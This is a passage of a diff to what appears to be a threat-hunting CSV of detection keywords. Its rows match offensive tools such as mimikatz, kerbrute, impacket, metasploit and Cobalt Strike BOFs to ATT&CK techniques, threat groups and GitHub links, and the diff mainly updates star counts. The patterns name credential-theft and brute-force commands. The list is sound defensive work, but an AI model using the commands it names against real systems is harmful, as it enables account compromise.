keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos_enumusers.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*kerberos-ldap-password-hunter.sh*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*kerberosv5.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*kerbrute -*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerberos::purge*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::tgt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos_enumusers.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kerberos-ldap-password-hunter.sh*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kerberosv5.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*kerbrute -*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
 "*kerbrute bruteuser *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*kerbrute passwordspray *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*kerbrute userenum *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*kerbrute userenum *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
-"*kerbrute*bruteforce*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
-"*kerbrute.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
-"*kerbrute/cmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
-"*kerbrute/util*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
-"*kerbrute_*.exe*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
-"*kerbrute_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*kerbrute_linux*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*kerbrute_pass_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*kerbrute_user_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*kerbrute_userpass_wordlist_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*kerbrute_windows*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential 
Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*KerbruteSession*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*kernel_shellcode.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*kernelcallbacktable.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*kernelcallbacktable.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*kernelcallbacktable.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
-"*kernelcallbacktable.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
-"*kernel-exploits*","offensive_tool_keyword","Github Username","github repo name hosting windows kernel exploits","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecWiki/windows-kernel-exploits","1","1","N/A","N/A","10","7472","2852","2021-06-11T23:29:15Z","2017-04-25T04:02:31Z"
+"*kerbrute userenum *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
+"*kerbrute*bruteforce*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
+"*kerbrute.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
+"*kerbrute/cmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
+"*kerbrute/util*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
+"*kerbrute_*.exe*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
+"*kerbrute_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*kerbrute_linux*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential 
Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kerbrute_pass_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_user_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_userpass_wordlist_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerbrute_windows*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*KerbruteSession*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential 
Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*kernel_shellcode.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kernelcallbacktable.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernelcallbacktable.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernelcallbacktable.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernelcallbacktable.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 